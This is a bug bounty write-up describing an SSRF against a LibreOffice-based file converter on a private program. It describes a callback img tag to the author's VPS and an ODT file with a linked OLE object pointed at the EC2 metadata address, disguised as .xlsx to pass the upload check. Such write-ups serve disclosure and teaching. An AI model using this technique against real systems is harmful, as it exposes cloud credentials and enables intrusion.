SSRF Exploitation in Libreoffice Spreadsheet File Converter

hello folks .
this is my first writeup about one of my recent finding on a private bug bounty program , i hope you can store a new informations on your mind from this writeup .
happy reading

the program was private so i will call it (penetsting.redacted.com )
i’ve start playing around the whole application trying to understand thow things work there , after some minutes i found an html editor under a file upload functionality i tried to bypass the upload protection but unfortunately the files was uploaded to an S3 bucket so there are no chance to shell the server or get a stored XSS, next i tried to figure out how text editor work exactly

when you create something inside the editor the backend convert the text to PDF and upload it to the s3 bucket in order to make a resume

i’ve tried to send an html syntax to the converter for get SSRF

but unfortunately there was a security mechanism convert my <img > tag output to a X image which mean we cannot access to the internal network !

i’ve tried a lot of encoding mechanism but nothing work !

after that i tried to figure out which software is respensible about converting editor code to pdf ! so i opened listenner using Netcat on my vps and put my ip&port inside the img tag <img src=”http://myvps:1337”>

and yeah i’ve received a request from the server that leak the name of the software in the User-Agent which is LibreOffice !
after that i used the server ip to find the host and yeah the application was pointed on an aws ec2 instance ! thats nice .

after that i start digging deeper in google to see how things work in LibreOffice and i’ve remember the file upload functionality that allow xlsx upload !

and as the uploader allows xlsx filess … it convert files to pdf too i thinked about abusing an libreoffice file to get internal network access

after some digging i found where the text content of the libreoffice document is located
The text content of the document is located in content.xml inside the file

Also in LibreOffice documents , you are able to embed OLE Objects inside of the documents this also support remote objects .

OLE Objects in LibreOffice work by fetching the contents of the remote URL and displaying the contents inside of a frame throught x-href. The OLE objects are embedded in the content.xml

Lets manipulate it !

first we will download and install libbreoffice
andd click at Insert -> object -> ole object -> create from file ->Checkbox “link to file”->enter a url > save the file as odt

and open the odt fileusing 7zip and open content.xml file using a text editor and modify the file by replacing the url inside xlink:href with an internal network ip and as all we know the application is inside a ec2 instance so will use [169.254.169.254] the EC2 instance local IP address in order to fetch the metadata

save the edited file and rename it to test.odt.xlsx

after upload the file !

and yeah i’ve bypasse the security mechanism and get the internal metadata of the ec2 instance wich can lead to A Remote code execution in a few more steps …

cheers .